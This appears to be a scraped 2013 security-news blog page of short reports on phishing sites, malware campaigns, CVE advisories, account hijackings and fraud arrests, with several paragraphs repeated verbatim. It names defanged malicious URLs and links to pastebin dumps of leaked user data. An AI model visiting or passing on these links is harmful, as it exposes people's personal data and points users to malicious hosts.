Today, I have come across a phishing page which is surprisingly being hosted in one of the Chinese government website that targets Paypal users.
The paypal phishing page is hosted in the "hxxp://www.121.gov.cn/app/p/index.html" that shows the fake login page of Paypal.
Once the victim enters his credentials and proceed to login, he will be redirected to another page where he will be asked to provide his financial info including name, address, credit card details.
Then users are asked to provide 3 digit secure code, password, security questions.
Once all the details have been entered, you will be redirected to page where it says: "Your information has been sent successfully. For your security, you will be automatically logged out.Thank you for using PayPal". This page redirects to the original paypal login page.
Sub-domain of the Brazilian State of Minas Gerais government website "hxxx://www.camaramontesanto.mg.gov.br" is found to be host same type of phishing page.
PhishTank record shows the 121.gov.cn hosts the phishing page from May 8 and camaramontesanto.mg.gov.br is from May 23.
1.http://www.phishtank.com/phish_detail.php?phish_id=1827926
2. http://www.phishtank.com/phish_detail.php?phish_id=1857679
Here we go, Twitter finally introduced the most anticipated security feature "Two-Step authentication" that prevents hackers getting access to your twitter accounts.
The recent cyberattacks from Syrian Electronic army(SEA) forced the twitter to enable the 2-step verification feature.
The SEA is the syrian hacker group who recently hijacked the high profile twitter accounts including accounts of Guardian , Telegraph, FT, AP and more via Social engineering attack(Phishing).
Once i said, the only feature that can stop the Syrian Electronic army is 2-step verification :
Thank you twitter for enabling this feature.
What is exactly 2-step Authentication?
Though i have already explained about this in my previous articles, i would like to explain one more time in this article.
"2-step authentication is a security feature that prompts you to enter a temporary password sent to your phone whenever you log into your account."
So how to enable this security feature?
The recent cyberattacks from Syrian Electronic army(SEA) forced the twitter to enable the 2-step verification feature.
The SEA is the syrian hacker group who recently hijacked the high profile twitter accounts including accounts of Guardian , Telegraph, FT, AP and more via Social engineering attack(Phishing).
Once i said, the only feature that can stop the Syrian Electronic army is 2-step verification :
I think 2-step authentication will prevent @official_sea12 from hacking ur Twitter account.@twitter can you make it fast?!!!!!! #EHN
— E Hacking News (@EHackerNews) May 5, 2013
Thank you twitter for enabling this feature.
What is exactly 2-step Authentication?
Though i have already explained about this in my previous articles, i would like to explain one more time in this article.
"2-step authentication is a security feature that prompts you to enter a temporary password sent to your phone whenever you log into your account."
So how to enable this security feature?
- Go to https://twitter.com/settings/account page
- Scroll to the bottom of the page , there you can find the "Account security" option.
- Select the option and follow the instructions
An unknown cybercriminals compromised the official facebook page of the Miguel Ángel Mancera, the Head of Government of the Mexican Federal District.
After hackers hijacked the page, the officials immediately suspended the facebook page to prevent misuse.
"Please note that the account of # Facebook's # JefeDeGob @manceramiguelmx has been hacked." reads the message posted in the @GobiernoDF. (translated)
"We have suspended the Facebook page to detect the causes of the inadequate functioning. Thanks for your understanding" The tweet posted by the @ManceraConecta .(translated)
After hackers hijacked the page, the officials immediately suspended the facebook page to prevent misuse.
"Please note that the account of # Facebook's # JefeDeGob @manceramiguelmx has been hacked." reads the message posted in the @GobiernoDF. (translated)
"We have suspended the Facebook page to detect the causes of the inadequate functioning. Thanks for your understanding" The tweet posted by the @ManceraConecta .(translated)
"The only person who know how to secure your system is the person who know how to break- Hacker." BreakTheSec.
A Romanian cybercriminal , who is six months into a 5-year sentence for supplying gadgets that conceal ATM skimmers has invented a new device that prevents ATM thefts, Reuters reported.
Valentin Boanta, 33-year-old, who was arrested in 2009 said his arrest made him happy because it helped him to get of his Blackhat hacking addiction.
"Crime was like a drug for me. After I was caught, I was happy I escaped from this adrenaline addiction." Reuters quoted as Boanta saying. "So that the other part, in which I started to develop security solutions, started to emerge."
Secure Revolving System-SRS:SRS device, funded by a technology firm called MB Telecom, can be installed in any existing ATM that prevents the operation of skimming devices.
The hacker with twitter handle Ag3nt47 who hits top university websites has breached the Suzuki and Mazda Russia websites.
The hacker tweeted links to the dump. The database dumped(pastebin.com/u01PitxP) from the Japanese automobiles manufacturer Suzuki includes password hashes, email addresses.
The data(pastebin.com/9hrwnmgC) taken from Russian website of the Japanese-based automobiles manufacturer Mazda contains no interesting data.
There is no specific reason mentioned by the Ag3nt47 for the attack. It appears the hacker randomly target high profile website.
This is another incident that reveals why you should be careful on the Internet. A British woman fell prey to a phishing scam and lost her £1million life savings.
The victim unwittingly handed over her personal details to fraudsters after receiving a bogus bank notification email.
Tamer Abdelhamid, the fraudster who stole the personal data then sold the info to Nigerian national, Rilwan Oshodi. A 26 year old woman from Sierra Leone used the data to change the bank details by pretending to be the victim.
Detectives seized Oshodi's computer during a raid on his home with details of more than 11,000 credit cards, according to DailyMail report.
The fraudsters purchased cheeseburgers, high-end computers, gold with the stolen money. They are facing jail for their roles in the scam.
Security researchers from Microsoft warn users of new piece of Trojan in the form of Mozilla add on and chrome extension that can hijack your facebook profile.
The threat was first discovered in Brazil , Microsoft detect it as "Trojan:JS/Febipos.A."
The Trojan monitors checks if the user is logged in to facebook. Then, it attempts to download a configuration file that includes a list of commands.
According to the Malware Protection center report, the malware is capable of doing the following with your facebook account: Like a page, share, post, Join a group,Invite friends to a group, Chat to friends, Comment on a post.
" There may be more to this threat because it can change its messages, URLs, Facebook pages and other activity at any time."Microsoft concluded. "In any case, we recommend you always keep your security products updated with the latest definitions to help avoid infection. "
Security researchers from Webroot have come across few font installing apps hosted on Google Play that install Android spyware called "iKno".
The apps look like a legitimate font app and allow users to install new font on their android device.
The researcher analyzed the app and identified malicious code that downloads and executes ikno.apk file from a website.
iKno is android spyware developed by Technoreap solutions that monitors call logs, text messages, location.
It appears the malicious apps and developer's account have been removed from the Google play.
A critical vulnerability(CVE-2013-3336) has been identified in the Adobe ColdFusion - a commercial rapid web application development platform. The security flaw allows hackers to remotely retrieve files stored on the server.
ColdFusion 10, 9.0.2, 9.0.1 and 9.0 and earlier versions for Windows, Macintosh and UNIX are affected.
Adobe in their security advisory warns that the vulnerability is already being exploited in the wild.
The company is in the process of finalizing a fix for this bug and expects it to be available on May 14, 2013.
In the meantime, the company offered a mitigation for this issue. Users can protect themselves by restricting public access to the CFIDE/administrator, CFIDE/adminapi and CFIDE/gettingstarted directories.
Last month, ESET analyzed a new sophisticated and stealthy Apache backdoor "Linux/Cdorked.A" that drive traffic to malicious pages.
Security researchers at ESET observed that more than 400 web servers infected with the backdoor "Linux/Cdorked.A" including 50 Top ranked websites.
In their recent report, ESET noted that the Lighttpd and nginx web servers also are affected by this backdoor.
"we found it will not deliver malicious content if the victim’s IP address is in a very long list of blacklisted IP ranges, nor if the victim’s internet browser’s language is set to Japanese, Finnish, Russian and Ukrainian, Kazakh or Belarusian." The report reads.
Researchers still not able to identify how this malicious software was deployed on the affected web servers.
The technical details are available at WeLiveSecurity
A Few days ago Alienvault Labs reported U.S Department of Labor website was hacked and redirects to malware page. In their report, they mentioned the exploit used in the attack was CVE-2012-4792.
After further analysis security researchers have discovered the vulnerability exploited in the cyber attack wasn't CVE-2012-4792 but a new zero-day affecting the Internet Explorer 8.
CVE identifier CVE-2013-1347 has been assigned for this new IE vulnerability. Microsoft noted that Internet Explorer 6, IE7, IE9, and IE10 are not affected by the vulnerability.
"U.S Department of Labor website wasn’t the only entity affected and we can confirm that at least 9 other websites were redirecting to the malicious server at the same time" AlienVault reports.
According to their report, the cyber attack targets the websites belong to several non-profit groups and institutes as well as a big european company that plays on the aerospace, defence and security markets.
Invincea's founder Anup Ghosh told NextGov that the "target of the attack are [Energy Department] folks in a watering hole style attack compromising one federal department to attack another".
Facebook updated the feature that allows users to recover the hacked account with the help of three Facebook friends. In the past, Facebook sent secret code to 3 facebook friends you choose. Using those secret codes, you can retrieve your account.
But this feature was abused by BlackHat hackers to compromise the victim's account by becoming friend from three different profiles.
To overcome this problem, Facebook introduced a new feature called "Trusted Contacts" that allows users to select 3 to 5 friends to receive the secret code to recover your account.
"It's sort of similar to giving a house key to your friends when you go on vacation--pick the friends you most trust in case you need their help." Facebook security update reads.
Simple steps to add trusted contacts to your account:
- Go to your Security Settings
- Click on the Trusted Contacts section
- Click Choose Trusted Contacts
- Choose 3-5 friends and confirm your choices
However, there are few risks in using this feature. If friends decided to have fun with you, they are able to access your facebook account.
I don't know why Facebook is not providing the two-step authentication like Google Does.
Canonical on May 2 released security advisory to fix ten Linux kernel vulnerabilities that affect the Ubuntu 12.10 version.
The list of vulnerabilities include Information leak in the Linux kernel's UDFfile system implementation ((CVE-2012-6548), Information leak in the Linux kernel's ISO9660 CDROM file system driver(CVE-2012-6549), Integer overflow in the Direct Rendering Manager (DRM), subsystem for the i915 video driver in the Linux kernel(CVE-2013-0913), Denial of service flaw in guest OS time updates in the Linuxkernel's KVM((CVE-2013-1796)).
Other vulnerabilities are Use after free error in guest OS time updates in the Linux kernel;s KVM (CVE-2013-1797), Flaw in the way KVM emulated the IOAPIC (CVE-2013-1798), Escalate privileges vulnerability in the Linux kernel's ext3 filesystem(CVE-2013-1848) , Buffer overflow was discovered in the Linux Kernel's USB subsystem for devices reporting the cdc-wdm class (CVE-2013-1860), information leak in the Linux kernel's dcb netlink interface (CVE-2013-2634) ,kernel stack information leak in the RTNETLINK component(CVE-2013-2635).
To patch these vulnerabilities, Ubuntu users are urged to update your system to the following package version: linux-image-3.5.0-28-generic 3.5.0-28.48 .
To update your system, please follow these instructions: https://wiki.ubuntu.com/Security/Upgrades.
Site Exposure Matrices (sem.dol.gov), the sub-domain of the United States Department of Labor website is found to be hacked and infected with malicious code.
The Malware analysts at AlientVault Labs analyzed the page and found one of the javascript file is infected and loads malicious external javascript code.
The external script is designed to collect the following information from the victim's computer: Java version, Microsoft Office version, Adobe Reader version, flash version running on the system.
The script is also able to check the presence of the following antivirus : Avira, BitDefender, Mcafee, AVG, NOD32, Dr.Web,Microsoft Security Essentials, Sophos, Kaspersky and F-Secure.
The collected information is being send to the remote server and it serves the malicious code that attempts to exploit the Use-after-free vulnerability in Internet Explorer(CVE-2012-4792).
The Malware analysts at AlientVault Labs analyzed the page and found one of the javascript file is infected and loads malicious external javascript code.
The external script is designed to collect the following information from the victim's computer: Java version, Microsoft Office version, Adobe Reader version, flash version running on the system.
The script is also able to check the presence of the following antivirus : Avira, BitDefender, Mcafee, AVG, NOD32, Dr.Web,Microsoft Security Essentials, Sophos, Kaspersky and F-Secure.
According to their report, some of the techniques used in the attack resembled the previous exploit identified in the Thailand NGO website.
The recent report from Symantec shows that, even Cyber criminals became a fan of Telugu actresses Kajal agarwal and Samantha. Cybercriminals started to use these actresses' name in their phishing campaign.
Few days after symantec spotted a phishing campaign with the title "Samantha & Kajal very hot song from Brindavanam Telugu movie", they spotted another phishing campaign that uses their name.
"the phishing site displayed a picture from a captivating musical number from the movie 'Saitan'." Symantec report reads. "The phishing site was titled, 'Samantha & Kajal Very Hot Song' but in fact, these celebrities were not a part of this movie. "
The phishing page requests the internauts who visit the page to log in for watching the video. When a user give the login credentials, they will be redirected to the legitimate movie website.
" If users fell victim to the phishing site by entering their login credentials, phishers would have successfully stolen their information for identity theft purposes." researcher says.
Few days after symantec spotted a phishing campaign with the title "Samantha & Kajal very hot song from Brindavanam Telugu movie", they spotted another phishing campaign that uses their name.
"the phishing site displayed a picture from a captivating musical number from the movie 'Saitan'." Symantec report reads. "The phishing site was titled, 'Samantha & Kajal Very Hot Song' but in fact, these celebrities were not a part of this movie. "
The phishing page requests the internauts who visit the page to log in for watching the video. When a user give the login credentials, they will be redirected to the legitimate movie website.
" If users fell victim to the phishing site by entering their login credentials, phishers would have successfully stolen their information for identity theft purposes." researcher says.
If you are using Social Media widget plugin in your WordPress site, make sure to remove it immediately. Sucuri has discovered that the plugin is being used to inject spam into your site.
The Social Media Widget is a simple sidebar widget that allows users to input their social media website profile URLs and other subscription options to show an icon on the sidebar to that social media site and more that open up in a separate browser window.
It is one of the popular plugin with more than 935,000 downloads, it means thousands of WordPress sites are affected.
According to Sucuri malware report, the plugin has a hidden call to a malicious url "hxxp://i.aaur.net/i.php", which is used to inject "Pay Day Loan" spam into the websites running the plugin.
The malicious code was added only in the latest version of the plugin , SMW 4.0. Users are recommended to remove the plugin from their sites. The plugin has been removed from the WordPress Plugin repository.
WordPress.com , a blog web hosting service provided, announced that they have enabled Two-step authentication feature to keep your blogger account secure.
Two factor authentication is a security feature that prompts you to enter a temporary secret number sent to your phone whenever you log into your account.
How to enable Two step authentication in Wordpress?
To enable this feature, go to the new Security tab in your WordPress.com account settings, and go through the setup wizard.
"We know your blog is important to you, and today we’re proud to announce Two Step Authentication: an optional new feature to help you keep your WordPress.com account secure." Wordpress.com blog post reads.
Trend Micro has uncovered a new piece of malicious software that appears to be using the note-taking service Evernote as Command and Control(C&C) Server.
The Trojan , dubbed as VERNOT, can perform several backdoor commands such as downloading , executing and renaming files. It harvests information of affected system .
Here is the interesting part, the malware receives malicious instructions from the Evernote accounts and at the same time, it stores the harvested information in the Evernote accounts.
"Misusing legitimate services like Evernote is the perfect way to hide the bad guys’ tracks and prevent efforts done by the security researchers." Researchers pointed out.
This is not the first time that a popular legitimate service is being abused as C&C server - In the past, Google Docs, Sendspace, Twitter, and other services have been used by Cyber Criminals to send instructions to malware.
The websites of the Knight Center for Journalism in the Americas and the International Symposium for Online Journalism hit by massive cyber attack that left the sites down for last two weeks.
“The malicious cyber-attack was enough to shut our websites down, but not to enough to shut us up. We rapidly created WordPress blogs to continue our regular and unique report on Journalism in the Americas,” said professor Rosental Alves, founder and director of the Knight Center for Journalism in the Americas at the University of Texas at Austin.
“We have no idea why someone would want to attack our sites"said professor Alves.
They noticed that the origin of the cyber-attack was in computers located in Russia.
According to the Knight center news report, the attack was taken place on March 11. Those affected websites are now back online.
"We had to shut down the sites, while the University of Texas IT department conduct its work to clean the sites and make sure increase its security levels.We are happy to be back with our normal presence on the Web,” said professor Alves.
“The malicious cyber-attack was enough to shut our websites down, but not to enough to shut us up. We rapidly created WordPress blogs to continue our regular and unique report on Journalism in the Americas,” said professor Rosental Alves, founder and director of the Knight Center for Journalism in the Americas at the University of Texas at Austin.
“We have no idea why someone would want to attack our sites"said professor Alves.
They noticed that the origin of the cyber-attack was in computers located in Russia.
According to the Knight center news report, the attack was taken place on March 11. Those affected websites are now back online.
"We had to shut down the sites, while the University of Texas IT department conduct its work to clean the sites and make sure increase its security levels.We are happy to be back with our normal presence on the Web,” said professor Alves.
Slovenian Police performed 12 house searches and arrested five cyber criminals who are believed to be responsible for the malware attacks that steals money from companies bank accounts.
It all started last year when the Slovenian national Computer Emergency Response Team(SI-CERT) started receive reports regarding a malware attacks.
The victims received emails pretending to be coming from a local bank and state tax authority with a Trojan horse attached.
The malware installs the Remote Administration tool that steals victim's e-banking credentials and send it to the cyber criminals.
"With stolen credentials and in the case where the victim did not remove the smart card containing the bank-issued certificate from the reader after use, the doors to the company's bank accounts were left open to the criminal gang." SI-CERT's report reads.
The attackers cleverly planned their attacks to happen on Fridays or the day before national holidays, so that the companies wouldn't immediately notice the theft.
According to the report, the criminal group used 25 money mules to transfer around 2 million Euros.
